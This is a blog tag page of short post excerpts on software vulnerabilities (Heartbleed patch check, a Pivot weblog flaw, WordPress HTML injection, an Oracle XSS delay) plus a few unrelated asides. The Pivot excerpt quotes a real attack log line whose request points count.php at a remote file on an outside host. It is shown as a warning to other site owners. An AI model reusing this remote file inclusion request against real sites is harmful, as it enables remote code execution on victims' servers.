Tag: vulnerability
-
If you're in the mad scramble to patch the Heartbleed vulnerability in OpenSSL on your Ubuntu servers but you need to see some documentation, look in your /usr/share/doc/openssl/changelog.Debian.gz file. If you see the following at the very top of the file, you're patched:
openssl (1.0.1-4ubuntu5.12) precise-security; urgency=medium
* SECURITY UPDATE: side-channel attack on Montgomery ladder implementation
- debian/patches/CVE-2014-0076.patch: add and use constant time swap in
crypto/bn/bn.h, crypto/bn/bn_lib.c, crypto/ec/ec2_mult.c,
util/libeay.num.
- CVE-2014-0076
* SECURITY UPDATE: memory disclosure in TLS heartbeat extension …
Read more...
-
Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:
a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …
Read more...
-
For the past couple of weeks the information security community has been noticing someone exploiting a new vulnerability in the Wordpress blogging software that lets the attacker inject arbitrary HTML code into the content from outside. So far, what has been seen is an
..
HTML entity containing multiple hyperlinks to other sites, presumably for the purpose of artificially bumping up someone's search engine rankings. Both the height and width of the injected HTML code are usually set to zero pixels each, but I've seen a couple of instances of one-by-one
..
entities as well. It stands to reason that pretty much …
Read more...
-
Oracle is best known for its database system, which many thousands of companies make use of in some capacity or another. It's big, it's bad, it's complex, but it's also got some amazing features, like clustering and replication that many other databases (open source and otherwise) can't hold a candle to, assuming that you understand it well enough to make it work. It's a complex beast, no two ways about it. That complexity, however, is no excuse for them taking two years to patch a security vulnerability in Oracle 10. It's a cross-site scripting bug in the enterprise search subsystem …
Read more...
-
Read more...
-
Note to self: All the walking in DC is making me go through tennis socks faster than I can replace them. I've blown through six socks in three days because they've ripped through without warning walk walking down the street. This is a little annoying because I feel like a slob. It's 2007, so the time for upgrading is probably upon most of us. To wit, here's something that should leave just about everyone drooling in anticipation: This Thursday upcoming, Hitachi will put their one terabyte hard drives on the consumer market with an opening price of $399us. The drives …
Read more...
-
Here's an article just in from the "In other news, fire is hot and water is wet" department: A study shows that studies funded by companies tend to frame the products of those companies in a better light. A three step study of 111 dietetic studies of soda milk, and water was performed in such a way that the groups of researchers were ignorant of the conclusions of the others (the protocol is outlined in the article, it's pretty neat) to determine if the findings of the studies would be helpful or harmful to the bottom line of the organisation …
Read more...